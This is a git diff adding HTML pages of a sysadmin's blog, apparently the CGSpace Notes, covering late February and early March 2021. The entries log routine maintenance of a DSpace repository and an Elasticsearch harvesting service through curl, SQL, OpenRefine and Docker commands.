+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-22
+</span></span></code></pre></div><ul>
+<li>Delete the current items index and clone the temp one to it:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span></code></pre></div><ul>
+<li>Then delete the temp and backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>{&#34;acknowledged&#34;:true}%
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-22&#39;</span>
+</span></span></code></pre></div><h2 id="2021-02-23">2021-02-23</h2>
+<ul>
+<li>CodeObia sent a <a href="https://github.com/ilri/OpenRXV/pull/75">pull request for clickable countries on AReS</a>
+<ul>
+<li>I deployed it and it seems to work, so I asked Abenet and Peter to test it so we can get feedback</li>
+</ul>
+</li>
+<li>Remove semicolons from series names without numbers:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 104
+</span></span><span style="display:flex;"><span>dspace=# COMMIT;
+</span></span></code></pre></div><ul>
+<li>Set all <code>text_lang</code> values on CGSpace to <code>en_US</code> to make the series replacements easier (this didn&rsquo;t work, read below):</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# BEGIN;
+</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE text_lang !=&#39;en_US&#39; AND dspace_object_id IN (SELECT uuid FROM item);
+</span></span><span style="display:flex;"><span>UPDATE 911
+</span></span><span style="display:flex;"><span>cgspace=# COMMIT;
+</span></span></code></pre></div><ul>
+<li>Then export all series with their IDs to CSV:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# \COPY (SELECT dspace_object_id, text_value as &#34;dcterms.isPartOf[en_US]&#34; FROM metadatavalue WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item)) TO /tmp/2021-02-23-series.csv WITH CSV HEADER;
+</span></span></code></pre></div><ul>
+<li>In OpenRefine I trimmed and consolidated whitespace, then made some quick cleanups to normalize the fields based on a sanity check
+<ul>
+<li>For example many Spore items are like &ldquo;Spore, Spore 23&rdquo;</li>
+<li>Also, &ldquo;Agritrade, August 2002&rdquo;</li>
+</ul>
+</li>
+<li>Then I copied the column to a new one called <code>cg.number[en_US]</code> and split the values for each on the semicolon using <code>value.split(';')[0]</code> and <code>value.split(';')[1]</code></li>
+<li>I tried to upload some of the series data to DSpace Test but I&rsquo;m having an issue where some fields change that shouldn&rsquo;t
+<ul>
+<li>It seems not all fields get updated when I set the text_lang globally, but if I updated it manually like this it works:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_value_id=5355845;
+</span></span><span style="display:flex;"><span>UPDATE 1
+</span></span></code></pre></div><ul>
+<li>This also seems to work, using the id for just that one item:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id=&#39;9840d19b-a6ae-4352-a087-6d74d2629322&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 37
+</span></span></code></pre></div><ul>
+<li>This seems to work better for some reason:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspacetest=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item);
+</span></span><span style="display:flex;"><span>UPDATE 18659
+</span></span></code></pre></div><ul>
+<li>I split the CSV file in batches of 5,000 using xsv, then imported them one by one in CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace metadata-import -f /tmp/0.csv
+</span></span></code></pre></div><ul>
+<li>It took FOREVER to import each file&hellip; like several hours <em>each</em>. MY GOD DSpace 6 is slow.</li>
+<li>Help Dominique Perera debug some issues with the WordPress DSpace importer plugin from Macaroni Bros
+<ul>
+<li>She is not seeing the community list for CGSpace, and I see weird requests like this in the logs:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>104.198.97.97 - - [23/Feb/2021:11:41:17 +0100] &#34;GET /rest/communities?limit=1000 HTTP/1.1&#34; 200 188779 &#34;https://cgspace.cgiar.org/rest /communities?limit=1000&#34; &#34;RTB website BOT&#34;
+</span></span><span style="display:flex;"><span>104.198.97.97 - - [23/Feb/2021:11:41:18 +0100] &#34;GET /rest/communities//communities HTTP/1.1&#34; 404 714 &#34;https://cgspace.cgiar.org/rest/communities//communities&#34; &#34;RTB website BOT&#34;
+</span></span></code></pre></div><ul>
+<li>The first request is OK, but the second one is malformed for sure</li>
+</ul>
+<h2 id="2021-02-24">2021-02-24</h2>
+<ul>
+<li>Export a list of journals for Peter to look through:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT text_value as &#34;cg.journal&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 3345
+</span></span></code></pre></div><ul>
+<li>Start a fresh harvesting on AReS because Udana mapped some items today and wants to include them in his report:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span></code></pre></div><ul>
+<li>Also, I want to include the new series name/number cleanups so it&rsquo;s not a total waste of time</li>
+</ul>
+<h2 id="2021-02-25">2021-02-25</h2>
+<ul>
+<li>Hmm the AReS harvest last night seems to have finished successfully, but the number of items is less than I was expecting:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 99546,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>The current items index has 101380 items&hellip; I wonder what happened
+<ul>
+<li>I started a new indexing</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-02-26">2021-02-26</h2>
+<ul>
+<li>Last night&rsquo;s indexing was more successful, there are now 101479 items in the index</li>
+<li>Yesterday Yousef sent a <a href="https://github.com/ilri/OpenRXV/pull/77/">pull request</a> for the next/previous buttons on OpenRXV
+<ul>
+<li>I tested it this morning and it seems to be working</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-02-28">2021-02-28</h2>
+<ul>
+<li>Abenet asked me to import seventy-three records for CRP Forests, Trees and Agroforestry
+<ul>
+<li>I checked them briefly and found that there were thirty+ journal articles, and none of them had <code>cg.journal</code>, <code>cg.volume</code>, <code>cg.issue</code>, or <code>dcterms.license</code> so I spent a little time adding them</li>
+<li>I used a GREL expression to extract the journal volume and issue from the citation into new columns:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/\(.*\)/,&#34;&#34;)
+</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;)
+</span></span></code></pre></div><ul>
+<li>This <code>value.partition</code> was new to me&hellip; and it took me a bit of time to figure out whether I needed to escape the parentheses in the issue number or not (no) and how to reference a capture group with <code>value.replace</code></li>
+<li>I tried to check the 1095 CIFOR records from last week for duplicates on DSpace Test, but the page says &ldquo;Processing&rdquo; and never loads
+<ul>
+<li>I don&rsquo;t see any errors in the logs, but there are two jQuery errors in the browser console</li>
+<li>I filed <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=934">an issue</a> with Atmire</li>
+</ul>
+</li>
+<li>Upload twelve items to CGSpace for Peter</li>
+<li>Niroshini from IWMI is still having issues adding WLE subjects to items during the metadata review step in the workflow</li>
+<li>It seems the BatchEditConsumer log spam is gone since I applied <a href="https://github.com/ilri/DSpace/pull/462">Atmire&rsquo;s patch</a></li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;BatchEditConsumer should not have been given&#39;</span> dspace.log.2021-02-<span style="color:#f92672">[</span>12<span style="color:#f92672">]</span>*
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-10:5067
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-11:2647
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-12:4231
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-13:221
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-14:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-15:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-16:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-17:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-18:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-19:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-20:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-21:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-22:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-23:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-24:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-25:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-26:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-27:0
+</span></span><span style="display:flex;"><span>dspace.log.2021-02-28:0
+</span></span></code></pre></div><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2021-03/index.html b/docs/2021-03/index.html
new file mode 100644
index 000000000..9154ea5d0
--- /dev/null
+++ b/docs/2021-03/index.html
@@ -0,0 +1,929 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2021" />
+<meta property="og:description" content="2021-03-01
+
+Discuss some OpenRXV issues with Abdullah from CodeObia
+
+He&rsquo;s trying to work on the DSpace 6&#43; metadata schema autoimport using the DSpace 6&#43; REST API
+Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2021-03/" />
+<meta property="article:published_time" content="2021-03-01T10:13:54+02:00" />
+<meta property="article:modified_time" content="2021-04-13T21:13:08+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2021"/>
+<meta name="twitter:description" content="2021-03-01
+
+Discuss some OpenRXV issues with Abdullah from CodeObia
+
+He&rsquo;s trying to work on the DSpace 6&#43; metadata schema autoimport using the DSpace 6&#43; REST API
+Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2021",
+  "url": "https://alanorth.github.io/cgspace-notes/2021-03/",
+  "wordCount": "4453",
+  "datePublished": "2021-03-01T10:13:54+02:00",
+  "dateModified": "2021-04-13T21:13:08+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2021-03/">
+
+    <title>March, 2021 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2021-03/">March, 2021</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2021-03-01T10:13:54+02:00">Mon Mar 01, 2021</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2021-03-01">2021-03-01</h2>
+<ul>
+<li>Discuss some OpenRXV issues with Abdullah from CodeObia
+<ul>
+<li>He&rsquo;s trying to work on the DSpace 6+ metadata schema autoimport using the DSpace 6+ REST API</li>
+<li>Also, we found some issues building and running OpenRXV currently due to ecosystem shift in the Node.js dependencies</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-02">2021-03-02</h2>
+<ul>
+<li>I fixed three build and runtime issues in OpenRXV:
+<ul>
+<li><a href="https://github.com/ilri/OpenRXV/pull/80">fix highcharts-angular and ngx-tour-core build</a></li>
+<li><a href="https://github.com/ilri/OpenRXV/pull/82">frontend/package.json: Pin @types/ramda at 0.27.34</a></li>
+</ul>
+</li>
+<li>Then I merged a few fixes that Abdullah had worked on last week</li>
+</ul>
+<h2 id="2021-03-03">2021-03-03</h2>
+<ul>
+<li>I <a href="https://github.com/ilri/OpenRXV/issues/83">fixed another frontend build warning on OpenRXV</a></li>
+<li>Then I <a href="https://github.com/ilri/OpenRXV/pull/84">updated the frontend container to use Node.js 12 and Ubuntu 20.04</a></li>
+<li>Also, I <a href="https://github.com/ilri/OpenRXV/pull/85">added a GitHub Actions workflow to build the frontend</a></li>
+<li>I did some testing of Abdullah&rsquo;s patch for the values mapping search on OpenRXV
+<ul>
+<li>It still doesn&rsquo;t work with multi-word values, so I recorded a video with wf-recorder and uploaded it to <a href="https://github.com/ilri/OpenRXV/issues/43">the issue</a> for him to investigate</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-04">2021-03-04</h2>
+<ul>
+<li>Peter is having issues with the workflow since yesterday
+<ul>
+<li>I looked at the Munin stats and see a high number of database locks since yesterday</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2021/03/postgres_locks_ALL-week.png" alt="PostgreSQL locks week">
+<img src="/cgspace-notes/2021/03/postgres_connections_cgspace-week.png" alt="PostgreSQL connections week"></p>
+<ul>
+<li>I looked at the number of connections in PostgreSQL and it&rsquo;s definitely high again:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>1020
+</span></span></code></pre></div><ul>
+<li>I reported it to Atmire to take a look, on the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=851">same issue</a> we had been tracking this before</li>
+<li>Abenet asked me to add a new ORCID for ILRI staff member Zoe Campbell</li>
+<li>I added it to the controlled vocabulary and then tagged her existing items on CGSpace using my <code>add-orcid-identifier.py</code> script:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-03-04-add-zoe-campbell-orcid.csv 
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
+</span></span><span style="display:flex;"><span>&#34;Campbell, Zoë&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
+</span></span><span style="display:flex;"><span>&#34;Campbell, Zoe A.&#34;,&#34;Zoe Campbell: 0000-0002-4759-9976&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-03-04-add-zoe-campbell-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I still need to do cleanup on the journal articles metadata
+<ul>
+<li>Peter sent me some cleanups but I can&rsquo;t use them in the search/replace format he gave</li>
+<li>I think it&rsquo;s better to export the metadata values with IDs and import cleaned up ones as CSV</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT dspace_object_id AS id, text_value as &#34;cg.journal&#34; FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=251) to /tmp/2021-02-24-journals.csv WITH CSV HEADER;
+</span></span><span style="display:flex;"><span>COPY 32087
+</span></span></code></pre></div><ul>
+<li>I used OpenRefine to remove all journal values that didn&rsquo;t have one of these values: ; ( )
+<ul>
+<li>Then I cloned the <code>cg.journal</code> field to <code>cg.volume</code> and <code>cg.issue</code></li>
+<li>I used some GREL expressions like these to extract the journal name, volume, and issue:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.partition(&#39;;&#39;)[0].trim() # to get journal names
+</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^(\d+)\(\d+\)/,&#34;$1&#34;) # to get journal volumes
+</span></span><span style="display:flex;"><span>value.partition(/[0-9]+\([0-9]+\)/)[1].replace(/^\d+\((\d+)\)/,&#34;$1&#34;) # to get journal issues
+</span></span></code></pre></div><ul>
+<li>Then I uploaded the changes to CGSpace using <code>dspace metadata-import</code></li>
+<li>Margarita from CCAFS was asking about an error deleting some items that were showing up in Google and should have been private
+<ul>
+<li>The error was &ldquo;Authorization denied for action OBSOLETE (DELETE) on BITSTREAM:bd157345-448e &hellip;&rdquo;</li>
+<li>I searched the DSpace issue tracker and found several issues reporting this:
+<ul>
+<li><a href="https://jira.lyrasis.org/browse/DS-3985">DS-3985 Delete item fails</a></li>
+<li><a href="https://jira.lyrasis.org/browse/DS-4004">DS-4004 Authorization denied Exception when trying to delete permanently an item, collection or community as a non-Admin user</a></li>
+<li><a href="https://jira.lyrasis.org/browse/DS-4297">DS-4297 Authorization error when trying to delete item by submitter/administrator</a></li>
+</ul>
+</li>
+<li>The issue is apparently with non-admin users who are in the admin and submit groups of the owning collection&hellip;</li>
+<li>In this case the item was uploaded to the CCAFS Reports collection, and Margarita is a non-admin user who is a member of the collection&rsquo;s admin and submit groups, exactly as the issue described</li>
+<li>I added a comment about our issue to <a href="https://jira.lyrasis.org/browse/DS-4297">DS-4297</a></li>
+</ul>
+</li>
+<li>Yesterday Abenet added me to a WLE collection approver/editer steps so we can try to figure out why Niroshini is having issues adding metadata to Udana&rsquo;s submissions
+<ul>
+<li>I edited Udana&rsquo;s submission to CGSpace:
+<ul>
+<li>corrected the title</li>
+<li>added language English</li>
+<li>changed the link to the external item page instead of PDF</li>
+<li>added SDGs from the external item page</li>
+<li>added AGROVOC subjects from the external item page</li>
+<li>added pagination (extent)</li>
+<li>changed the license to &ldquo;other&rdquo; because CC-BY-NC-ND is not printed anywhere in the PDF or external item page</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-03-05">2021-03-05</h2>
+<ul>
+<li>I migrated the Docker bind mount for the AReS Elasticsearch container to a Docker volume:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml down
+</span></span><span style="display:flex;"><span>$ docker volume create docker_esData_7
+</span></span><span style="display:flex;"><span>$ docker container create --name es_dummy -v docker_esData_7:/usr/share/elasticsearch/data:rw elasticsearch:7.6.2
+</span></span><span style="display:flex;"><span>$ docker cp docker/esData_7/nodes es_dummy:/usr/share/elasticsearch/data
+</span></span><span style="display:flex;"><span>$ docker rm es_dummy
+</span></span><span style="display:flex;"><span># edit docker/docker-compose.yml to switch from bind mount to volume
+</span></span><span style="display:flex;"><span>$ docker-compose -f docker/docker-compose.yml up -d
+</span></span></code></pre></div><ul>
+<li>The trick is that when you create a volume like &ldquo;myvolume&rdquo; from a <code>docker-compose.yml</code> file, Docker will create it with the name &ldquo;docker_myvolume&rdquo;
+<ul>
+<li>If you create it manually on the command line with <code>docker volume create myvolume</code> then the name is literally &ldquo;myvolume&rdquo;</li>
+</ul>
+</li>
+<li>I still need to make the changes to git master and add these notes to the pull request so Moayad and others can benefit</li>
+<li>Delete the <code>openrxv-items-temp</code> index to test a fresh harvesting:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span></code></pre></div><h2 id="2021-03-05-1">2021-03-05</h2>
+<ul>
+<li>Check the results of the AReS harvesting from last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 101761,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Set the current items index to read only and make a backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-03-05
+</span></span></code></pre></div><ul>
+<li>Delete the current items index and clone the temp one to it:</li>
+</ul>
